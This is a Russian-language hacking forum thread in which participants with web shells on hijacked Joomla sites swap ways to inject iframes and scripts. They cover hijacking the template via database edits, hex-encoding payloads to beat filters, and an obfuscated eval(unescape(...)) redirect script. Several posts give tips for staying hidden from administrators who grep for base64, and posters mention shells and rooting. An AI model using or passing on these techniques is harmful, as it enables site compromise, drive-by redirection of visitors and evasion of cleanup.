CMS Joomla - вставка iframe.
 

Собственно сабж. Есть админка в Jooml'e, надо поставить iframe :p

1.) В шаблоновский и главный index.php записать нельзя - нет прав :o
2.) Через модули не предлагать - снимают очень быстро :(
3.) На файлы кроме индексов есть права с записью/чтением.
Вот такие условия!

Есть еще какие-нить идеи?

лей компонент Joomla Xplorer и правь через него

Править что? Если индекс, то я уже говорил: index.php мне никак не поправить, на нем -r-xr-xr-x С модулей убирают быстро... Вот и ищу куда можно еще ифрейм в джумле пихнуть! :o
Актуально...

открой индекс сайта в браузере -- посмотри какой юзается темплейт у сайта

будет ченить типа
<link href="./templates/rt_modbusiness/css/orange_color.css" rel="stylesheet" type="text/css" />

rt_modbusiness - имя темплейта -- заходи в корень джумлы ->templates->rt_modbusiness->index.php --- его и правь если прав хватит

genom--
В том-то и дело что нет прав ни на главный index.php, ни на шаблоновский index.php (я же в 1 посте написал). Есть права на все файлы, кроме индексов.

Скажите вставил ifrdme в конец кода в inde.php и после этого пишет ошибу - сам скрипт перестаёт работать , если удолить всё работает как быть ? может в сам код прописать ток как?? скажите плиз.

смотря куда ты его вставил?
и смотря что там за index.php
может там есть шаблон и его легче поравить?

Вообщем что я могу поиметь ;)
Что закинуть?
media/ Доступен на запись
administrator/components/ Доступен на запись
components/ Доступен на запись
images/stories/ Доступен на запись

Эээй! Не отвелкаемся от основной темы :) Ищу любые способы установки iframe в Joomla, кроме редактирования индексов и модулей.

Если сайт посещаемый (1k уников) - то читай статьи про траффик.

Если у тебя есть шелл, а судя по этому:

он у тебя есть.

Попробуй сделать следующее:

1. Посмотри есть ли права на запись в файл с конфигами (configuration.php), если есть то правь его, он инклудится индексовой страницей.

или...

2. Есть еще один замутный способ, нужно что бы хоть какая то папка была доступна для записи.


1) Смотришь содержимое configuration.php, находишь в нём данные для соединения с БД.
2) Лезишь в БД и смотришь таблицу jos_templates_menu (префикс может отличаться):

3) Находишь имя директории с используемым темплейтом.

4) Идешь в папку с темплейтами templates и видишь в этой папке папку с используемым темплейтом:

5) Копируешь эту папку целиком в доступную тебе для записи. К примеру language (т.е. в итоге должно получиться language/blabla).

6) В скопированном темплейте меняешь индексовую страницу вставляя в неё нужный тебе код.

7) Снова лезишь в БД и правишь запись:

Всё теперь будет использоваться твой темплейт, который можно править, вставляя в него свой php код.

Grey
+1. Подумывал о таком извращенском варианте, но проблема была в том, как быстро сменить шаблон и не убить сайт. =)
п.с. не, на configuration.php прав нету :(

Ну на configuration.php права на запись редко бывают, а второй способ оправдал себя на практике. Особенно если есть права на запись в папке с темплейтами - откопировать в неё темплейт с чуть изменёным именем не так уж и палевно.

P.S. есть еще 3-ий вариант - попробывать рутануть (но это уже выходит за рамки темы).

Только щас увидел что тебе нужно вставить не php код, а просто кусок html'вского кода, а второе сделать проще некуда - лезишь в БД и находишь какую нидь таблицу с содержимым сайта (в которой есть html код (а такие там есть jos_categories, jos_content, jos_sections)) и добавляешь в неё ифрейм.

2Grey
Второй способ пробовал(доступ к БД есть, юзал как c99shell от madnet, так и RSTSQL) Но почему-то при добавлении в БД <iframe=...> превращалось в &lt;iframe=...&gt; (может все данные проходят через htmlspecialchars?)

Я так понял что данные добавляются в БД уже в виде '&lt;iframe=...&gt;', т.е. что то не то при добавление, а не при выводе (т.е. когда в БД все норм, но на страницу выводится криво).
Если так то попробуй, добавлять данные, закидывая их предварительно в хексы:

ОгА :) Спасиб!

Ага у меня тоже такое '&lt;iframe=...&gt;' тока я не понял как все что там в хексы закинуть там слишком много текста =( в итоге не пойму как про ифремить сайт

В инете есть тулзы, которые любой объем текста закинут в HEX ;)

К примеру здесь:

Ясно спасибо =)

А вот еще вопрос возник может кто знает причину.
Вообщем index править не дают я вставляю в модуль свой ифрейм но почему-то буквально через несколько сек он автоматически убирается в чем может быть причина ?

Хм... А всмысле сам убирается?
Ты когда модуль редактируешь, то с помощью визуального редактора правишь? (ну там TinyMCE например) Или в чистом HTML?

Вообщем вот так? (на фон не обращай внимания...)

http://ipicture.ru/uploads/080608/thumbs/6D1MFVw6fN.png

Или так?

http://ipicture.ru/uploads/080608/thumbs/qmLJo3Rhzh.png

Просто если WYSIWYG редактором, то он автоматически убирает теги <iframe> и <script>



Кстати, хотел делать инжект <iframe> через БД, но не в сам контент модуля, а в его заголовок. Делал с предварительным перекидыванием в HEX... Не вышло, видимо, джумла при самом выводе из БД прогоняет все через htmlspecialchars...

XaCeRoC, если ты хочешь профреймить php скрипт - то надо добавлять фрейм или после ?> или между <??> но с помощью echo '<iframe....';

Я в чистый HTML добавляю как на 2 рисунке и он секунд 20 работает потом кудато изчезает странным образом :(

Хм... А точно не админ убирает? У меня такого никогда не было. Попробуй вставить iframe не через админку, а напрямую через БД. ;)

ага это точно не админ убирает 100% :) да и у меня такова тоже не когда не было =(

Там короче что то стоит так как вот сделал эксперимент тока что удалил нтмл код из меню прошло несколько сек и меню вернулось в начальный вид значит там какойто модуль стоит или еще что-то что возвращает все в исходный вид =(

Эммм... Никогда такого не видел :) Стукни в аську - посмотрим ;)

Кстати, не знаю с чем это связано, но если в index.php у некоторых CMS добавлять
то скрипт не работает... приходилось делать

Связано это скорее всего с тем что ты забываешь экранироать кавычки:

В этом случае нужно экранировать все двойные кавычки:

Теперь у меня проблема такая вставляю в контент фрейм от там сохранится но на самом сайте выводит к примеру если в ставить

<script type="text/javascript">
eval(unescape('%77%69%6E%64%6F%77%2E%6C%6F%63%61%7 4%69%6F%6E%20%3D%20%22%68%74%74%70%3A%2F%2F%77%77% 77%2E%68%69%64%65%6C%69%6E%6B%73%2E%63%6F%6D%2F%3F %39%31%6E%74%74%73%76%6C%68%6C%22%3B'));
</script>

то он выводит тока
<script type="text/javascript">
eval</script>


если просто <iframe то он вобще не чего не выводит хотя сохранено вобщем вопрос такой как еще можно замаскировать фрейм что бы его вставить?

Итак. Апаю тему. Появились следующие траблы. Стали попадаться такие сайты, в которых iframe просто нереально вставить.

Джумла фильтруют любой вывод из БД, фильтруются все теги типа <iframe> и <script>. Они просто вырезаются. Фильтруется контент модулей и все остальное. Прав на запись в файлы нету!
Оооочень нужно поставить iframe, выслушаю любые идеи! :o

Ну в таком случае сделай так:

https://forum.antichat.ru/showpost.p...4&postcount=10

Это конечно геморно, но сделав один раз - второй сделать будет уже легче) - там гарантировано будет выводиться все как надо, т.к. вывод будет из файла, туда и пхп код можно запихнуть.

Ммм... За этот способ спс. Кое-где получилось ;) Ну а если вообще нету прав на запись? Вообще нету, ниодной папки!

Да но есть 1 проблема во всяком случае у меня не вышло сделать так как указано в том примере так как путь до темпла был слишком длинный и он не записывался весь в базу поэтому писалось ошибка что не может найти темпл =(

Можно в /tmp попробовать пихнуть шаблон, но вот сколько он там пролежит?... :)

А тут такая фигня есть права на запись везде де мона! лезу в index.php вставляю iframe
с заекранированимы кавычками сейвлю и во всем index.php появляются слеши перед кавычками и усе перестает работать! хелп, чо ето ?

Rubaka, если ты пишешь iframe внутри тегов <? ?>, то используй echo():

Или просто вставляй фрейм до или после этих тегов.

обробую спс! ехо писал

Обробовал! не пмагает! Хотел просто Хелло вывести нифига!

В footer.php прописал <?echo "Hello";?> При сохранении все кавычки и в ПХП коде и в html cлешами екранируются!Убрал все слеши руками засейвил не пмагает! если сохранить несколько раз кол-во слешей увеличевается! Вообщем непонятно!!!

2n0ne

могу в ПМ тебе линк с шеллом кинуть,если канешна не прикрыли еще!сам глянешь чо за фигня

Rubaka, ты это "Hello" писал внутри тегов <? ?> или за ними?

з.ы. просто может какой-то конфликт или ещё что-то. Попробуй внутри оригинальных <??> написать echo 'asd';

с промлемой разобрался с помошью base64decode encode!
А чо при сейве просто добавляет екранирующие слеши непнятно!

Не используйте в своих скриптах/айфрейм-кодах слишком много base64_decode/encode, т.к. админы сейчас умные пошли, и как только палят айфрейм на сайте - то сразу проверяют грепом на base64, "выуживая" таким образом все вредные коды.
п.с. Проверено на себе, потерял много шеллов :(